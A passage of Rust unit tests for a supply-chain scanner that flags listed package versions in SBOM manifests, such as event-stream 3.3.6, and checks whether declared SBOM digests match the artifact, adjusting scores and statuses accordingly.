1307 { "purl": "pkg:npm/event-stream@3.3.6" },
1308 { "purl": "pkg:npm/leftpad@1.0.0" }, ]
1310 });
1311 let mut outcome = clean_outcome();
1312 apply_sbom_findings(&mut outcome, &sbom);
1313 assert_eq!(outcome.status, "warning"); assert_eq!(outcome.score, 60);
1315 let findings = outcome.findings.as_array().unwrap();
1316 assert!(findings.iter().any(|f| f["title"].as_str().unwrap().contains("event-stream")));
1317 }
1318
1319 #[test]
1320 fn sbom_flags_version_prefix_match() {
1321 let sbom = serde_json::json!({
1324 "components": [
1325 { "purl": "pkg:cargo/openssl-src@111.0.5" },
1326 { "purl": "pkg:cargo/openssl-src@300.1.0" },
1327 ]
1328 });
1329 let mut outcome = clean_outcome();
1330 apply_sbom_findings(&mut outcome, &sbom);
1331 let findings = outcome.findings.as_array().unwrap();
1332 let hits: Vec<_> = findings
1333 .iter()
1334 .filter(|f| f["title"].as_str().unwrap().contains("openssl-src"))
1335 .collect();
1336 assert_eq!(hits.len(), 1, "only the 111.0.x row should match");
1337 }
1338
1339 #[test]
1340 fn sbom_clean_manifest_passes() {
1341 let sbom = serde_json::json!({
1342 "components": [
1343 { "purl": "pkg:npm/leftpad@1.0.0" },
1344 { "purl": "pkg:cargo/serde@1.0.200" },
1345 ]
1346 });
1347 let mut outcome = clean_outcome();
1348 apply_sbom_findings(&mut outcome, &sbom);
1349 assert_eq!(outcome.status, "pass");
1350 assert_eq!(outcome.score, 100);
1351 }
1352
1353 #[test]
1354 fn sbom_malformed_records_informational_finding() {
1355 let sbom = serde_json::json!({ "wrong_root": [] });
1356 let mut outcome = clean_outcome();
1357 apply_sbom_findings(&mut outcome, &sbom);
1358 assert_eq!(outcome.status, "pass");
1360 assert_eq!(outcome.score, 100);
1361 let findings = outcome.findings.as_array().unwrap();
1362 assert!(findings
1363 .iter()
1364 .any(|f| f["title"].as_str().unwrap().contains("no 'components'")));
1365 }
1366
1367 #[test]
1368 fn sbom_binding_bound_when_digest_matches() {
1369 let sbom = serde_json::json!({
1370 "metadata": {
1371 "component": {
1372 "name": "my-plugin",
1373 "hashes": [
1374 { "alg": "SHA-256", "content": "DEADbeef" }
1375 ]
1376 }
1377 }
1378 });
1379 let binding = verify_sbom_binding(&sbom, "deadbeef");
1380 assert!(matches!(binding, SbomBinding::Bound));
1381 }
1382
1383 #[test]
1384 fn sbom_binding_unsigned_when_no_digest() {
1385 let sbom = serde_json::json!({
1386 "components": [
1387 { "purl": "pkg:npm/leftpad@1.0.0" }
1388 ]
1389 });
1390 let binding = verify_sbom_binding(&sbom, "deadbeef");
1391 assert!(matches!(binding, SbomBinding::Unsigned));
1392 }
1393
1394 #[test]
1395 fn sbom_binding_mismatch_when_digest_disagrees() {
1396 let sbom = serde_json::json!({
1397 "metadata": {
1398 "component": {
1399 "hashes": [
1400 { "alg": "SHA-256", "content": "aaaa1111" }
1401 ]
1402 }
1403 }
1404 });
1405 let binding = verify_sbom_binding(&sbom, "bbbb2222");
1406 match binding {
1407 SbomBinding::Mismatch { declared } => {
1408 assert_eq!(declared, "aaaa1111");
1409 }
1410 other => panic!("expected Mismatch, got {:?}", other),
1411 }
1412 }
1413
1414 #[test]
1415 fn sbom_binding_walks_component_hashes_too() {
1416 let sbom = serde_json::json!({
1419 "components": [
1420 {
1421 "name": "my-plugin",
1422 "hashes": [
1423 { "alg": "sha-256", "content": "CAFEBABE" }
1424 ]
1425 }
1426 ]
1427 });
1428 let binding = verify_sbom_binding(&sbom, "cafebabe");
1429 assert!(matches!(binding, SbomBinding::Bound));
1430 }
1431
1432 #[test]
1433 fn record_binding_mismatch_downgrades_outcome() {
1434 let mut outcome = clean_outcome();
1435 record_sbom_binding(
1436 &mut outcome,
1437 &SbomBinding::Mismatch {
1438 declared: "aaaa1111".to_string(),
1439 },
1440 );
1441 assert_eq!(outcome.score, 40);
1443 assert_eq!(outcome.status, "warning");
1444
1445 let mut warn_outcome = ScanOutcome {
1448 status: "warning".to_string(),
1449 score: 60,
1450 findings: JsonValue::Array(vec![]),
1451 };
1452 record_sbom_binding(
1453 &mut warn_outcome,
1454 &SbomBinding::Mismatch {
1455 declared: "aaaa1111".to_string(),
1456 },
1457 );
1458 assert_eq!(warn_outcome.score, 0);
1459 assert_eq!(warn_outcome.status, "fail");
1460 }
1461
1462 #[test]
1463 fn record_binding_unsigned_keeps_pass_with_minor_penalty() {
1464 let mut outcome = clean_outcome();
1465 record_sbom_binding(&mut outcome, &SbomBinding::Unsigned);
1466 assert_eq!(outcome.status, "pass");
1467 assert_eq!(outcome.score, 95);
1468 }
1469}